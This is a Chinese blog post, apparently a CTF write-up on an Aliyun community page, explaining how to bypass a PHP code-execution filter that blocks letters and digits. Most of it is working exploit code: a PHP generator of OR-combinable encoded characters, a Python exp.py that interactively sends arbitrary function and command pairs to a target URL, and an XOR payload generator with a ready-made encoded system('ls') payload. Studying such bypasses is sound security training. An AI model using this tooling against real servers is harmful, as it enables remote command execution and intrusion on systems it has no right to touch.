AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

详解PHP代码执行漏洞--无字母shell

2022-10-26 211
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 代码执行漏洞无字母shell讲解

@TOC

题目如下
在这里插入图片描述
很明显,这道题过滤了所有的字母和数字
具体应该怎么做呢?可以利用位操作符凭借可显示字符(本题的原理)
这么说一头雾水对么?下面来看看具体过程

或运算

==这里的脚本分为了两个部分,一个是根据题目要求制作出符合题目的拼接可显示字符,另一个就是负责拼接==
==rce.php(制作出题目要求字符)==

<?php
$myfile = fopen("rce.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {
        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; # 这里放题目要求
        if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg,
hex2bin($hex_j))) {
            echo "";
        } else {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) | urldecode($b)); # & | ~ 根据题目选择
            if (ord($c) >= 32 & ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }
    }
}
fwrite($myfile, $contents);
fclose($myfile);

==exp.py(拼接字符)==

import requests
import urllib
from sys import *
import os
os.system("php rce.php") #没有将php写入环境变量需手动运行
def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("rce.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")" # & | ~ 根据题目选择,和上一个脚本保持一致
    return(output)
url = "http://test"
while True:
    param=action(input("\n[+] your function:") )+action(input("[+] yourcommand:"))
    data={
        'c':urllib.parse.unquote(param)
    }
    r=requests.post(url,data=data)
    print("\n[*] result:\n"+r.text)
脚本分享完了,下面介绍具体使用方法
1 进入当前目录
2 打开rce.php,这里用vscode举例
在终端中输入php rce.php
在这里插入图片描述
回车后发现当前文件夹多了以一个文本
在这里插入图片描述
3 打开exp.py
在终端输入python exp.py
在这里插入图片描述
4 按照自己的意愿输入即可
在这里插入图片描述

异或运算

如果发现上面的脚本无法执行,可以看看这个脚本

<?php
$s="ls";
for($i=0;$i<strlen($s);$i++){
    echo "%".dechex(ord($s[$i])^0xff);
}
echo "^";
for($i=0;$i<strlen($s);$i++){
    echo"%ff";
}
修改XXX的位置即可,这里用system(ls)举例子
==system==
在这里插入图片描述
==ls==
在这里插入图片描述
传参的时候组合一下就可以了(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%93%8c^%ff%ff)

如果文章对您有帮助的话,关注贤鱼支持一下吧

文章标签:
PHP
Python
Shell
安全
关键词:
PHP漏洞
PHP shell
PHP代码
漏洞Shell
Shell字母
贤鱼不闲
目录
相关文章
1842782014377483
|
1月前
|
IDE PHP 开发工具
PHP中的类型提示与严格模式:提高代码可维护性
随着PHP语言的发展,开发者对代码的可读性、可维护性和可靠性有了更高的要求。PHP中的类型提示(Type Hinting)和严格模式(Strict Mode)为开发者提供了更强的类型检查机制,有助于提升代码质量和减少潜在的错误,尤其是在大型项目中。
1842782014377483
45 1
请看我回答~
|
2月前
|
安全 程序员 PHP
PHP中的异常处理:提升代码的健壮性
【10月更文挑战第8天】在编程的世界中,错误和异常是不可避免的。它们就像路上的坑洼,可能会让我们的程序“跌倒”。但是,如果我们能够正确地处理这些异常,就可以让我们的程序更加稳健,就像我们学会了如何在坑洼的路上稳稳地行走一样。本文将介绍PHP中的异常处理机制,以及如何使用它来提升我们的代码质量。
请看我回答~
50 1
帅政的oss
|
16天前
|
SQL 安全 PHP
PHP安全性实践:防范常见漏洞与攻击####
本文深入探讨了PHP编程中常见的安全漏洞及其防范措施,包括SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造等。通过实际案例分析,揭示了这些漏洞的危害性,并提供了具体的代码示例和最佳实践建议,帮助开发者提升PHP应用的安全性。 ####
帅政的oss
40 6
八百标兵奔北坡
|
22天前
|
SQL 安全 JavaScript
在多用户环境中,如何确保 PHP Shell 的安全性?
在多用户环境中确保 PHP Shell 安全,需采取限制执行环境、禁用危险函数、使用安全模式、采用 `suPHP` 或 `PHP-FPM`、使用参数化查询、输入验证、转义命令、强化会话管理、合理配置错误处理、正确设置文件权限及定期更新等措施。这些策略有助于防范潜在的安全威胁。
八百标兵奔北坡
29 8
muxiaoxi
|
22天前
|
PHP 开发者 容器
PHP命名空间深度解析:避免命名冲突与提升代码组织####
本文深入探讨了PHP中命名空间的概念、用途及最佳实践,揭示其在解决全局命名冲突、提高代码可维护性方面的重要性。通过生动实例和详尽分析,本文将帮助开发者有效利用命名空间来优化大型项目结构,确保代码的清晰与高效。 ####
muxiaoxi
20 1
左诗右码
|
29天前
|
供应链 安全 NoSQL
PHP 互斥锁:如何确保代码的线程安全?
在多线程和高并发环境中,确保代码段互斥执行至关重要。本文介绍了 PHP 互斥锁库 `wise-locksmith`,它提供多种锁机制(如文件锁、分布式锁等),有效解决线程安全问题,特别适用于电商平台库存管理等场景。通过 Composer 安装后,开发者可以利用该库确保在高并发下数据的一致性和安全性。
左诗右码
38 6
shuj
|
25天前
|
PHP 开发者 UED
探索PHP中的异常处理:提升代码的健壮性
在PHP开发中,优雅地处理错误和异常是确保应用稳定性和用户体验的关键。本文将通过深入浅出的方式,介绍如何在PHP中实现有效的异常处理机制,包括异常的基本概念、如何抛出和捕获异常,以及最佳实践。准备好让你的代码变得更加健壮和可靠吧!
shuj
20 2
aliyun0641063962-48771
|
1月前
|
SQL 安全 PHP
PHP安全性深度剖析:防范常见漏洞与最佳实践####
本文深入探讨了PHP编程中不可忽视的安全隐患,重点介绍了SQL注入、XSS攻击、CSRF攻击及文件包含漏洞等四大常见安全威胁。通过详尽的案例分析与防御策略阐述,为开发者提供了一套实用的安全编码指南。文章强调,提升代码安全性是保障Web应用稳健运行的关键,鼓励开发者在日常开发中积极践行安全最佳实践。 ####
aliyun0641063962-48771
41 3
游客7v53mftipku2u
|
19天前
|
SQL 安全 PHP
PHP安全性深度探索:防范常见漏洞与最佳实践####
本文深入剖析了PHP开发中常见的安全漏洞,包括SQL注入、XSS攻击、CSRF攻击及文件包含漏洞等,并针对每种漏洞提供了详尽的防御策略与最佳实践。通过实例分析,引导读者理解如何构建更加安全的PHP应用,确保数据完整性与用户隐私保护。 ####
游客7v53mftipku2u
24 0
天下无贼001
|
1月前
|
PHP 开发者
PHP中的异常处理:提升代码的健壮性
【10月更文挑战第40天】在PHP编程中,异常处理是确保应用稳定性的关键。本文将引导你理解异常处理的重要性,掌握如何在PHP中捕获和处理异常,以及如何通过自定义异常类来增强代码的错误管理能力。我们将一起探索如何利用PHP的异常处理机制,打造一个更加健壮和可靠的应用程序。
天下无贼001
26 0

热门文章

最新文章

  • 1
    shell find一段时间内哪些文件被修改过
  • 2
    分享平时工作中那些给力的shell命令(更新版)
  • 3
    adb shell查看sqlite数据库
  • 4
    读书笔记--101个shell脚本 之#11--炫
  • 5
    使用shell生成状态报表
  • 6
    巩固shell基础知识
  • 7
    批量远程执行shell命令工具
  • 8
    一些重要的shell命令
  • 9
    shell中单引号、双引号
  • 10
    RHCE课程-RH033Linux基础笔记四之shell以及环境变量
  • 1
    深入理解PHP7中的返回类型声明
    51
  • 2
    深入理解PHP的命名空间与自动加载机制
    63
  • 3
    PHP 7.4中新增特性的探索与实践
    50
  • 4
    深入理解PHP7的返回类型声明
    60
  • 5
    android通过http上传文件,服务器端用php写(原创)
    69
  • 6
    PHP医院安全不良事件管理系统源码(AEMS)前端vue2+element+后端laravel8不良事件上报与闭环管理
    86
  • 7
    深入理解PHP的命名空间与自动加载机制
    61
  • 8
    深入理解PHP的命名空间和自动加载机制
    45
  • 9
    网安之PHP基础练习
    49
  • 10
    1688快速获取整店铺列表 采集接口php Python
    59

    • 相关课程

    更多
  • Shell 脚本进阶
  • Shell 脚本入门
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
  • Linux Shell 编程入门与实战
  • PHP完全自学手册文档教程
  • Shell 编程入门到精通

    • 相关电子书

    更多
  • PHP安全开发:从白帽角度做安全
  • PHP 2017.北京 全球开发者大会——高可用的PHP
  • 复杂PHP系统性能瓶颈排查及优化

    • 相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
  • 10分钟Serverless部署PHP商城
  • Alibaba Cloud Linux操作系统Shell程序
    • 下一篇
    DataWorks售前咨询